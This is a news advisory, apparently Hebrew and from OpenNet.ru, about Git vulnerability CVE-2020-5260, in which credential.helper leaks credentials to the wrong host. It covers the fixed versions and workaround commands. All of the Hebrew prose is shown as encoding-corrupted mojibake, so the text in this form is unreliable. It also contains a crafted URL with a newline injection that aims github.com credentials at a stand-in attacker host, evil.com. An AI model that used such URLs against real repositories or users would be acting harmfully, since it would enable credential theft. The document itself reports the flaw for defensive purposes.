ืคื’ื™ืขื•ืช ืฉืœ ื“ืœื™ืคืช ืื™ืฉื•ืจื™ื ืฉืœ Git

ื™ืฆื ืœืื•ืจ ืžื”ื“ื•ืจื•ืช ืžืชืงื ื•ืช ืฉืœ ืžืขืจื›ืช ื‘ืงืจืช ื”ืžืงื•ืจ ื”ืžื‘ื•ื–ืจ Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ื•-2.17.4, ื‘ ืืฉืจ ื—ื™ืกืœ ืคื’ื™ืขื•ืช (CVE-2020-5260) ื‘ืžื˜ืคืœ"credential.helper", ืžื” ืฉื’ื•ืจื ืœืื™ืฉื•ืจื™ื ืœื”ื™ืฉืœื— ืœืžืืจื— ื”ืœื ื ื›ื•ืŸ ื›ืืฉืจ ืœืงื•ื— git ื ื™ื’ืฉ ืœืžืื’ืจ ื‘ืืžืฆืขื•ืช ื›ืชื•ื‘ืช URL ื‘ืคื•ืจืžื˜ ืžื™ื•ื—ื“ ื”ืžื›ื™ืœื” ืชื• ื—ื“ืฉ. ื ื™ืชืŸ ืœื”ืฉืชืžืฉ ื‘ืคื’ื™ืขื•ืช ื›ื“ื™ ืœืืจื’ืŸ ืฉืœื™ื—ืช ืื™ืฉื•ืจื™ื ืžืžืืจื— โ€‹โ€‹ืื—ืจ ืœืฉืจืช ื”ื ืฉืœื˜ ืขืœ ื™ื“ื™ ื”ืชื•ืงืฃ.

ื›ืืฉืจ ืžืฆื™ื™ื ื™ื ื›ืชื•ื‘ืช URL ื›ืžื• "https://evil.com?%0ahost=github.com/", ืžื˜ืคืœ ื”ืื™ืฉื•ืจื™ื ื‘ืขืช ื—ื™ื‘ื•ืจ ืœืžืืจื— evil.com ื™ืขื‘ื™ืจ ืืช ืคืจืžื˜ืจื™ ื”ืื™ืžื•ืช ืฉืฆื•ื™ื ื• ืขื‘ื•ืจ github.com. ื”ื‘ืขื™ื” ืžืชืจื—ืฉืช ื‘ืขืช ื‘ื™ืฆื•ืข ืคืขื•ืœื•ืช ื›ื’ื•ืŸ "ื’ื™t clone", ื›ื•ืœืœ ืขื™ื‘ื•ื“ ื›ืชื•ื‘ื•ืช URL ืขื‘ื•ืจ ืชืช-ืžื•ื“ื•ืœื™ื (ืœื“ื•ื’ืžื”, "git submodule update" ื™ืขื‘ื“ ืื•ื˜ื•ืžื˜ื™ืช ืืช ื›ืชื•ื‘ื•ืช ื”-URL ืฉืฆื•ื™ื ื• ื‘ืงื•ื‘ืฅ .gitmodules ืžื”ืžืื’ืจ). ื”ืคื’ื™ืขื•ืช ืžืกื•ื›ื ืช ื‘ื™ื•ืชืจ ื‘ืžืฆื‘ื™ื ืฉื‘ื”ื ืžืคืชื— ืžืฉื›ืคืœ ืžืื’ืจ ืžื‘ืœื™ ืœืจืื•ืช ืืช ื›ืชื•ื‘ืช ื”ืืชืจ, ืœืžืฉืœ, ื›ืืฉืจ ืขื•ื‘ื“ื™ื ืขื ืชืช-ืžื•ื“ื•ืœื™ื, ืื• ื‘ืžืขืจื›ื•ืช ืฉืžื‘ืฆืขื•ืช ืคืขื•ืœื•ืช ืื•ื˜ื•ืžื˜ื™ื•ืช, ืœืžืฉืœ, ื‘ืกืงืจื™ืคื˜ื™ื ืฉืœ ื‘ื ื™ื™ืช ื—ื‘ื™ืœื•ืช.

ื›ื“ื™ ืœื—ืกื•ื ื ืงื•ื“ื•ืช ืชื•ืจืคื” ื‘ื’ืจืกืื•ืช ื—ื“ืฉื•ืช ืืกื•ืจ ื”ืขื‘ืจืช ืชื• ื—ื“ืฉ ื‘ื›ืœ ืขืจื›ื™ื ื”ืžื•ืขื‘ืจื™ื ื“ืจืš ืคืจื•ื˜ื•ืงื•ืœ ื”ื—ืœืคืช ื”ืื™ืฉื•ืจื™ื. ืขื‘ื•ืจ ื”ืคืฆื•ืช, ืืชื” ื™ื›ื•ืœ ืœืขืงื•ื‘ ืื—ืจ ืฉื—ืจื•ืจ ืขื“ื›ื•ื ื™ ื”ื—ื‘ื™ืœื•ืช ื‘ื“ืคื™ื ื“ื‘ื™ืืŸ, ืื•ื‘ื•ื ื˜ื•, ืจื”ืœ, SUSE/openSUSE, ืคื“ื•ืจื”, ืงืฉืช, FreeBSD.

ื›ืคืชืจื•ืŸ ืขื•ืงืฃ ืœื—ืกื™ืžืช ื”ื‘ืขื™ื” ืžื•ืžืœืฅ ืืœ ืชืฉืชืžืฉ ื‘-credential.helper ื‘ืขืช ื’ื™ืฉื” ืœืžืื’ืจื™ื ืฆื™ื‘ื•ืจื™ื™ื ื•ืืœ ืชืฉืชืžืฉ ื‘-"git clone" ื‘ืžืฆื‘ "--recurse-submodules" ืขื ืžืื’ืจื™ื ืœื ืžืกื•ืžื ื™ื. ื›ื“ื™ ืœื”ืฉื‘ื™ืช ืœื—ืœื•ื˜ื™ืŸ ืืช ื”ืžื˜ืคืœ credential.helper, ืืฉืจ ืขื•ืฉื” ื–ืืช ืฉื™ืžื•ืจ ื•ืื—ื–ื•ืจ ืกื™ืกืžืื•ืช ืž ืžื˜ืžื•ืŸ, ืžื•ื’ืŸ ืงืžืจื•ื ื•ืช ืื• ืงื•ื‘ืฅ ืขื ืกื™ืกืžืื•ืช, ืืชื” ื™ื›ื•ืœ ืœื”ืฉืชืžืฉ ื‘ืคืงื•ื“ื•ืช:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

ืžืงื•ืจ: OpenNet.ru

ื”ื•ืกืคืช ืชื’ื•ื‘ื”